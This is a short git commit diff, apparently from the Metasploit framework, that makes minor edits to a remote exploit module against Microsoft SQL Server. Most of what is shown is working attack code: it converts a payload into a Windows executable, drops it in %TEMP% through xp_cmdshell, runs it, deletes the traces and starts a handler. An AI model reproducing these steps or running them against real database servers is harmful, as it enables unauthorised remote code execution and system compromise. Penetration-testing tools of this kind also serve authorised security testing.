Minor cleanups
git-svn-id: file:///home/svn/framework3/trunk@7163 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
59676df4db
commit
c4bfae59aa
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
print_status("Warning: This exploit will leave #{var_payload}.exe in the System32 directory of the target")
|
||||
print_status("Warning: This exploit will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
|
||||
|
||||
hex = Msf::Util::EXE.to_win32pe(framework,payload.encoded).unpack("H*")[0]
|
||||
|
||||
|
@ -86,12 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_status("Converting the encoded payload...")
|
||||
mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
|
||||
mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
|
||||
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
|
||||
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
|
||||
|
||||
print_status("Executing the payload...")
|
||||
mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
|
||||
mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
|
Loading…
Reference in New Issue